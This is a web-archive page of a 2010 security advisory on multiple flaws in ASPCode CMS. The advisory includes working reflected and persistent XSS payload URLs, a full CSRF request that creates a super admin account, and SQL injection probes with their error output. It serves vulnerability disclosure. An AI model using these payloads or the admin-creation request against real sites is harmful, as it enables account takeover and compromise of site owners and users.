SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

ASPCode CMS 1.5.8 2.0.0b103 Multiple Vulnerability


Arrow  SecurityAlert : 7054
Arrow  CVE : CVE-2010-0711
Arrow  CWE : CWE-352
Arrow  SecurityRisk : Medium  Security Risk Medium  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : Yes
Arrow  Exploit Available : No
Arrow  Credit : Alberto "fulgur" Fontanella
Arrow  Published : 02.03.2010

Arrow  Affected Software : aspcodecms:aspcode_cms:1.5.8
aspcodecms:aspcode_cms:2.0.0_build_103



Arrow  Advisory Content :  

#
#
# Multiple Vulnerability in ASPCode CMS
#
# [Software Version]: <= v1.5.8
# [Vendor WebSite]: www.aspcodecms.com
# [Date]: 01 January 2010
#
# Found by Alberto "fulgur" Fontanella
#
# itsicurezza<0x40>yahoo.it - ictsec.wordpress.com
#
#


[1] - [Multiple XSS Vulnerability]

http://[host]/default.asp?sec=1&ma1="><script>alert("XSS");</script>

http://[host]/default.asp?sec=1&tag="><script>alert("XSS");</script>

http://[host]/default.asp?sec=1&ma2="><script>alert("XSS");</script>

XSS found also on Form to reset password:
http://[host]/default.asp?sec=33&ma1=forgotpass

Put XSS String in Email Field and Submit it


[2] - [Persistent XSS]

Post in Guestbook Section: http://[host]/default.asp?sec=23

<img
src="http://[host]/default.asp?sec=1&ma1="><script>alert("XSS");</script>">
</img>


[3] - [CSRF]

To Delete an User Account


http://[host]/default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=us
ers&ma2=delete&idx=50

To Create a Super Admin Account

POST
/default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=users&ma2=updat
e&idx=-1
HTTP/1.1
Host: [host]
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
http://[host]/default.asp?a1=admin&a2=modules&a3=manage&module=users&ma1=us
ers&ma2=edit&idx=-1
Content-Type: application/x-www-form-urlencoded
Content-Length: 140


username=HAXOR&password=PASSWD&old_password=&password_is_encrypted=false&em
ail=HAXOR%40BLACKHAT.ORG&roleId=4&redirsectionid=0&confirmed=true

You can use CSRF + XSS (Very Dangerous)


[4] - [Possible SQL Injection]

http://[host]/default.asp?sec=64&ma1=tag&tag=CMS'

Errore numero: -2147217900
Errore: Errore di sintassi (operatore mancante) nell'espressione della
query
'[ID] IN ()'.

Query:
SELECT * FROM [section] s WHERE [ID] IN ()


http://[host]/default.asp=sec=1'

Errore di run-time di Microsoft VBScript (0x800A000D)
Tipo non corrispondente: 'sectionID'
/include/api.asp, line 657


Arrow  References :

http://secunia.com/advisories/38596
http://packetstormsecurity.org/1002-exploits/aspcodecms-xssxsrf.txt
http://osvdb.org/62357




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc/fnmatch(3) DoS

Security Risk Medium- 2011-05-13

Allow attacker to denial of service apache 2.2.17 server

Apache RSS Apache Alert

» Apache HTTP Server Denial
   of Service Vulnerability

» Multiple Vendors
   libc/fnmatch(3) DoS (incl
   apache poc)

» Apache Continuum
   cross-site scripting
   vulnerability

» Apache Tomcat DoS
   Vulnerability

PHP RSS PHP Alert

» PHP Hashtables Denial of
   Service

» PHP 5.3.6 multiple null
   pointer dereference

» PHP 5.3.6 ZipArchive
   invalid use glob(3)

» libzip 0.9.3
   _zip_name_locate NULL
   Pointer Dereference (incl
   PHP 5.3.5)

ADT

Protect your family and valuables with Home Security Systems

Copyright © SecurityReason.com. All Rights Reserved.